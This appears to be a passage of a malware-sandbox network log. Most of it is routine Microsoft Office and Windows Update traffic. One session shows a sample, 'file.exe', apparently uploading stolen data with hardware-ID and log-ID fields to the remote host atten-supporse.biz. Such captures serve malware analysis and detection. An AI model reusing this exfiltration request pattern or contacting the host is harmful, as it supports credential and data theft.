                                                                                                                                                                                    2024-11-29 18:49:22 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    17192.168.2.64972513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:21 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:22 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 467
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                    x-ms-request-id: 50b713a5-901e-0015-7a04-42b284000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184922Z-174f7845968cdxdrhC1EWRg0en00000010bg0000000039np
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:22 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    18192.168.2.64972652.149.20.212443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:22 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=79HRUOOHgFAO4nP&MD=mY8Kwcd6 HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                    2024-11-29 18:49:23 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                    MS-CorrelationId: e0dd2908-7526-43b8-9a70-dee7184f4a28
                                                                                                                                                                                    MS-RequestId: cb892bcb-80f0-486d-b850-c607f262d56a
                                                                                                                                                                                    MS-CV: JN0wjOwyYUa12nVC.0
                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:22 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                    2024-11-29 18:49:23 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    19192.168.2.649728104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:23 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=8JHVBARWPDSDZ5GZK
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 551599
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: 2d 2d 38 4a 48 56 42 41 52 57 50 44 53 44 5a 35 47 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 38 4a 48 56 42 41 52 57 50 44 53 44 5a 35 47 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 4a 48 56 42 41 52 57 50 44 53 44 5a 35 47 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                    Data Ascii: --8JHVBARWPDSDZ5GZKContent-Disposition: form-data; name="hwid"F0C6D9CC520E1722EFA3D63B69E7CA14--8JHVBARWPDSDZ5GZKContent-Disposition: form-data; name="pid"1--8JHVBARWPDSDZ5GZKContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: d9 73 33 54 85 a8 44 56 1c 89 10 98 f6 2f d1 f1 68 22 21 7e 30 a3 b0 3f 48 6a 87 69 b6 6f b0 7d d8 fd a5 a6 e8 25 53 49 44 8a 90 82 31 4e fa ed e1 31 e5 5f 61 01 d1 99 cf 13 67 26 1a 5c d0 2d 15 36 47 53 77 06 6e 8c 5d 31 d2 5a bf 6e 6e da 86 12 77 1e 34 a7 e1 ae 1a 3b a8 2a 33 bf b9 14 34 49 4b ce 6a 90 e6 7b 9a c4 54 a4 78 99 46 16 1f 64 56 39 95 cb e8 b9 a4 ad 4e 7a e8 5f b2 65 4d 4d 16 98 b0 35 42 19 7f 85 c8 db e8 e6 c7 10 5c 0f d5 28 e0 8f b4 c2 a5 5e bf b2 e3 5b 2f 5e ad f6 df 58 05 19 07 e8 a1 e3 a8 bb 7a 0c 51 31 74 8c a4 0e 43 8b 25 5b d6 09 71 46 74 1d 85 6a 54 18 f6 79 ec ce f8 a3 f4 18 88 51 ca e3 35 5c 06 dd 4a 7b 14 40 b6 f6 f2 91 df 00 e3 d8 6b 3c 53 90 30 27 f3 da 7e e2 af fe 3a ff 51 d4 d2 0e 1f 13 34 3d d9 ed c6 8b c1 6c 77 a1 73 ff 24
                                                                                                                                                                                    Data Ascii: s3TDV/h"!~0?Hjio}%SID1N1_ag&\-6GSwn]1Znnw4;*34IKj{TxFdV9Nz_eMM5B\(^[/^XzQ1tC%[qFtjTyQ5\J{@k<S0'~:Q4=lws$
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: ca 54 0d ce 43 d8 ca b4 79 8a 25 a7 7f 53 8f 38 ae 34 51 97 c2 7d ee 6c 07 3d 4a 5f 12 f8 90 5c 85 1d da ed d1 89 9a 7c cb 59 35 80 d1 59 47 67 6e 59 90 6a d0 72 3d 4f 1e da 4e 81 d6 8b cd 02 82 55 e6 59 19 da 3f 14 53 0c b6 f1 e2 eb dc 2d e5 e1 36 e6 e5 af b8 64 13 c9 b5 71 97 82 86 20 54 93 a6 75 1b f1 8a e0 41 a7 53 e5 41 f1 8b 47 15 cc 2d 39 b2 3e 59 bf e9 23 00 77 6a 7b b3 d6 fe 33 ba d4 fd b6 5b d8 88 68 cf 5c c9 db 03 75 1b 83 3e 3d 14 6e 3f e5 e4 52 6d a4 1b 4c 15 00 a5 0d df dd 7b 96 5c 83 4f 47 7c 7a 9f f9 d8 9d 3b 6b df 53 d1 65 6a c4 fd d0 af 65 f3 fa 2d 6b 63 8d f2 66 f6 7d 65 40 f3 8d e8 55 ed de 6f 27 34 d0 14 3f 40 8b a5 a7 89 d4 43 10 69 fa c6 f5 68 bd e8 ad 95 0e 5d d6 14 c4 c0 8a 0c d7 8d f0 81 7a 13 00 58 7d 77 21 58 e5 83 81 57 13 60
                                                                                                                                                                                    Data Ascii: TCy%S84Q}l=J_\|Y5YGgnYjr=ONUY?S-6dq TuASAG-9>Y#wj{3[h\u>=n?RmL{\OG|z;kSeje-kcf}e@Uo'4?@Cih]zX}w!XW`
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: aa fc b1 d9 dc fe ba 28 f6 27 ec 14 c8 3b da ef 1a 9e aa 9d f8 68 8a 7b 74 ad ae 68 08 ce 92 66 32 b3 fb ab ad 7e a3 a6 3f a9 7d 72 28 56 a9 be 87 66 dc 63 e3 60 01 28 89 17 ce 87 52 64 a2 31 82 d4 24 6f 91 4c 88 15 b7 56 b8 a7 db 48 1c 26 b7 ec 71 20 dd b8 22 fe 4b 31 f0 19 1b b7 9c 79 28 3d b8 32 ce fd cb 7a c5 48 8c 60 f7 6f b8 00 41 38 d8 28 89 da 6d 9f 36 43 77 fd 53 21 bc 52 76 71 2e 3f a4 b8 12 97 99 34 e7 f3 a9 57 12 a4 45 fe af 35 ea ff 5d 0e 55 d8 0e a6 b1 a8 13 fe a0 fb 8a d5 2e 90 a3 85 71 99 e4 03 0d ab 01 57 15 ae 31 65 d4 b1 9f 3b 9a d6 8e 1d 04 87 f9 e3 a5 22 dc 20 cb c5 57 71 21 28 f8 a4 3f 08 ed 3f 1c ed 72 cd 94 41 c1 67 59 0d 0d ce 2f 24 61 41 aa c2 0f 63 ee d1 46 27 59 ce d1 c4 ab d8 90 8f 8d c6 cc 17 d6 c9 21 07 51 7d 6f d1 05 fc 50
                                                                                                                                                                                    Data Ascii: (';h{thf2~?}r(Vfc`(Rd1$oLVH&q "K1y(=2zH`oA8(m6CwS!Rvq.?4WE5]U.qW1e;" Wq!(??rAgY/$aAcF'Y!Q}oP
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: 02 72 e9 bf 86 72 f8 74 7f 67 39 1d d5 9e b4 a7 78 de 8f 83 ff 31 56 05 f5 92 f3 22 75 61 4f e3 b4 d4 6b 4b b3 5d da 24 e3 9f 33 93 bc 5b 11 80 4f 13 b1 d5 45 0f 11 8b 18 6d 52 77 4a 65 23 27 fa 8c d5 81 73 91 6d 3a 5d 7b f5 68 a9 ab 22 dd 61 17 eb 7b 95 f5 3f 32 c9 f9 e1 1c b4 30 0a b5 91 40 0f bd 5f 81 90 69 01 d4 b4 e8 22 c4 32 b1 7b 43 9f 0e ff 70 62 be d1 08 1b ee d2 a0 6c e9 9a 69 9f 34 34 c8 e2 77 ef 2f bf bd f1 52 94 26 c2 6f 03 ec 30 3c 5d f9 b6 3a e3 29 99 22 90 5c 27 1b 69 54 87 24 81 c4 31 d4 b9 ad 8b 63 d5 e8 f9 f8 52 8d 74 f8 8e f0 d2 63 61 35 b9 64 0b db 8c 04 9c b8 d8 de f9 c2 1d db b4 05 14 6e 71 27 d7 9f ca 46 1e 11 36 ae fa b6 d2 a8 15 b0 9a d9 c2 26 84 35 6a 63 c4 c1 eb de 7d 23 59 53 12 e0 db fd c6 43 58 7a f0 35 aa bc fc 4e 20 f8 15
                                                                                                                                                                                    Data Ascii: rrtg9x1V"uaOkK]$3[OEmRwJe#'sm:]{h"a{?20@_i"2{Cpbli44w/R&o0<]:)"\'iT$1cRtca5dnq'F6&5jc}#YSCXz5N
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: ab 63 ba af 35 2d 64 93 5b 4d 29 06 e8 e4 e3 8c 80 16 72 16 e9 e0 9a 99 c8 0d 80 1f 23 c1 59 ee 98 f0 d6 f4 6b c2 34 f5 c0 16 27 d1 ad 29 30 9b 93 42 e8 18 df 3b d0 92 86 21 29 0c 58 f7 d1 1f 4b 7f ba 35 37 c8 cd 6f 2f b1 30 96 36 43 74 41 5a 39 38 2f 3f 2f 8e 20 1b 6e 76 cd af 31 80 d0 eb 1b 5b c8 26 d8 e7 32 c4 c0 02 38 2e e9 a2 5c f8 d0 b2 0d ab b1 61 90 c8 b1 59 cb 44 31 be f6 ae 1d 21 39 72 6e f1 5a bc 32 7a 66 11 0d c7 3c d4 85 c0 be 54 a0 89 e6 4d 57 52 df f8 85 93 69 e4 73 51 a7 3d 64 32 8a 39 05 e2 69 11 65 b3 0c d3 dd a5 2a af 35 ba 7f 5e 47 a3 c0 c0 e2 6a d3 11 98 1d 03 6f ea 63 f8 c1 6d 32 ed dd 7f 9b 6c 37 01 93 a6 06 2c e3 1c f3 27 fd f9 98 17 21 c6 5f 54 5d 0c b0 e3 c3 6a 11 bd 2d 41 41 e6 c3 88 8f c8 ba 84 e2 0e 89 17 c8 e3 f1 c7 a5 c0 74
                                                                                                                                                                                    Data Ascii: c5-d[M)r#Yk4')0B;!)XK57o/06CtAZ98/?/ nv1[&28.\aYD1!9rnZ2zf<TMWRisQ=d29ie*5^Gjocm2l7,'!_T]j-AAt
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: bc 3a 01 e0 9b f3 cf fd d9 7f bb 36 41 6d eb f0 14 2a 75 d7 f7 a1 3f 43 e5 c5 4b 01 15 31 58 42 d9 8f 86 51 51 53 3d a7 1d 32 24 63 a8 69 a0 f5 71 dc 28 44 36 23 4f 83 fc 46 d6 03 aa 6d e7 1b 4b dc 96 38 e2 fa ce 14 0d 26 2a 2a f4 b5 6c ab 3e 1a b9 90 68 4b b0 d5 3a 33 50 6b ad e5 12 b1 43 b4 f4 24 33 09 a9 ed ab e9 ff db 0e 0e 4f 11 f2 18 ca f0 46 bf 96 a5 07 f4 45 09 2e e8 d8 0d 3d f6 9c 77 d3 aa e0 be f3 fc 04 f8 3c 79 c5 04 8a f6 94 e7 e4 b9 ed be 80 db 91 56 4f 00 5a 98 10 be d7 44 fc b8 9b 2d c2 48 ba 94 f8 c0 a4 17 73 dc c7 78 67 ea ae c9 d3 e4 14 1f f9 d7 be 3c 47 60 86 cd d1 24 f5 aa e7 53 b5 ef 8a 16 ae 12 6c 47 1a 34 6f a5 9a d5 24 6d 26 fe 7d c1 8c ac 81 28 9a 6f 55 ca b1 73 03 e6 75 c6 08 93 c1 39 b5 4c 9b 17 8c 0e d1 1c d6 03 1f 57 8d 4d ba
                                                                                                                                                                                    Data Ascii: :6Am*u?CK1XBQQS=2$ciq(D6#OFmK8&**l>hK:3PkC$3OFE.=w<yVOZD-Hsxg<G`$SlG4o$m&}(oUsu9LWM
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: 81 e1 3e e8 0d 82 56 6d 01 ef d9 21 95 8e 25 78 05 36 23 98 7f 3a 8f 3f aa cc d1 53 11 3d 77 bc 44 cb e4 fc a9 7a 32 59 08 d1 5b 5b 7b 14 38 42 dc fc f3 fa 20 eb a4 32 73 7b b7 a7 94 cc 5c 1b 94 e2 25 a2 f9 6f d8 6a 78 72 9a 9f ab 66 9f 6c 91 c5 47 04 f9 11 1a 96 44 88 49 e7 1e d3 6e 97 f4 7a 14 f6 5b c1 81 17 2d 10 98 d1 35 79 c7 c4 3f 43 96 f3 92 44 ab e2 d1 8a 43 39 73 f4 3b 13 0d 82 6c d4 d0 13 b6 1e b2 db bf b2 45 67 5b e8 cf 7a dd 9c 39 46 82 e7 b8 a9 d3 6a 91 61 5d 58 fb 71 12 c2 44 43 a0 e8 3b 65 a6 93 b0 a9 91 99 11 c9 70 e3 35 7f 16 64 f8 bc e0 0e c6 85 30 f5 99 06 0d 34 41 e8 97 dc 4e e6 25 0b c7 4b cc 5a 68 ed 7b ef 31 96 b6 e1 78 07 90 92 11 7c 2d 94 b4 84 9c 95 ab 5d d3 68 12 55 97 a3 89 cb 47 f8 41 c3 c2 44 45 8a 62 56 fa e3 10 94 7b a6 00
                                                                                                                                                                                    Data Ascii: >Vm!%x6#:?S=wDz2Y[[{8B 2s{\%ojxrflGDInz[-5y?CDC9s;lEg[z9Fja]XqDC;ep5d04AN%KZh{1x|-]hUGADEbV{
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: 3d 82 28 a1 71 0a 87 fd 3d c3 58 7f 73 25 9f 16 a2 75 a6 ce 3b 60 a7 5e 45 a3 f7 43 ba c7 e2 13 85 32 66 77 98 4d 26 2c 6a 74 45 a7 01 62 fa ac 66 05 54 10 4b c7 30 a2 90 7e 8a a3 c6 12 05 10 36 ad 7a 57 bc 17 98 be da cb 5c 7a 7e cc 0d 49 7c e6 a1 f7 f0 af 22 28 81 99 04 a2 c6 04 1c 35 04 5e f2 60 37 d3 1e a4 44 52 61 ce bf b7 8d be bb 89 94 0d 0a 9f 85 16 ba 00 ec 88 32 48 72 74 08 14 b9 86 05 d0 7a 97 98 9e 89 c2 82 7b 72 cc ce 85 70 8d 87 e6 55 a1 48 ac e2 7a d7 a6 69 74 24 2a 2a 3a 6a ac 63 1e b6 32 76 cf c2 a2 83 3c 45 32 5a 85 cf 99 62 5b cc 0e 1c 4e bd 2a 28 0e 1e 9d 64 18 6b 08 5c 42 03 39 a5 ed 07 a2 a7 13 19 89 c7 49 6d 88 06 f7 3b 58 c1 be 17 1c 51 90 58 04 5a be 30 d6 4e 83 6a 9c 84 74 59 b6 d7 f5 c3 2d 87 d8 26 d0 28 e3 5e e9 43 86 4a b4 8e
                                                                                                                                                                                    Data Ascii: =(q=Xs%u;`^EC2fwM&,jtEbfTK0~6zW\z~I|"(5^`7DRa2Hrtz{rpUHzit$**:jc2v<E2Zb[N*(dk\B9Im;XQXZ0NjtY-&(^CJ
                                                                                                                                                                                    2024-11-29 18:49:23 UTC15331OUTData Raw: e3 2d 34 cd a5 8e e5 07 0e f3 96 30 83 a2 13 84 99 bd a1 4d 2f e6 fe 04 1b 8d 73 7f 29 25 56 ee a9 e2 7e 1c 1e 5b db 81 46 6d d4 52 e8 c3 e1 14 ee ec dc 38 dd 2d b5 89 36 cf a6 07 58 32 87 94 51 dc 46 73 46 02 e5 77 ed b0 c7 c4 82 df 58 e8 e6 77 ce e0 7a 90 4a 90 9f 49 59 6e 80 e8 ec 94 08 fd cf 7b 7d 00 4a 0f a5 3c dc fc e2 66 bf 45 b0 b8 4d 4e e1 e9 71 d0 f7 f6 c2 ba 5f f7 ff 1d f6 3a 00 65 04 2d ec 02 1f 70 e4 50 04 55 e2 2a b6 4d 0b 6c 65 ab 6d 14 1d 69 13 db 0a 84 a6 0a 63 ca 42 f8 7c 14 9d 3e e8 5c 24 bf c3 50 5a fe 3c a6 91 f9 9e 5b 6c 2d 43 26 5f 09 32 b7 de e4 fe bb 65 77 58 db 92 32 9f 89 07 0c f8 50 ba bf de 8d 14 98 e8 bb 4b ff 09 7a 2c c8 76 a0 16 ee 78 0a 48 d9 70 f7 0e cf 9a 93 12 10 75 5b d3 0f 11 04 18 78 14 f6 41 ff 6c 6d 7a 10 c2 06 05
                                                                                                                                                                                    Data Ascii: -40M/s)%V~[FmR8-6X2QFsFwXwzJIYn{}J<fEMNq_:e-pPU*MlemicB|>\$PZ<[l-C&_2ewX2PKz,vxHpu[xAlmz
                                                                                                                                                                                    2024-11-29 18:49:30 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:30 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=3m8vj3bpsgu7v9beqea8mrnd3b; expires=Tue, 25-Mar-2025 12:36:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaTBjeuY%2B6y72CEhM3aVKhG1XGrHlbHKIH9eZUBQ%2FSCIrynZoTTEnZCpiV5OEdHgh7VdxQhkyvJmdLJumLqoxlrYQHdIc5%2B1qkwVC61XyqsCGXkNFO4I%2BQ7hpQl%2FL7kOgqgMxWQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c702af09c338-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1716&rtt_var=649&sent=284&recv=577&lost=0&retrans=0&sent_bytes=2847&recv_bytes=554081&delivery_rate=1701631&cwnd=228&unsent_bytes=0&cid=33bca03375bfadaf&ts=7207&x=0"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    20192.168.2.64972913.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:24 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:24 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                    x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184924Z-174f7845968j6t2phC1EWRcfe800000010bg00000000pf1e
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
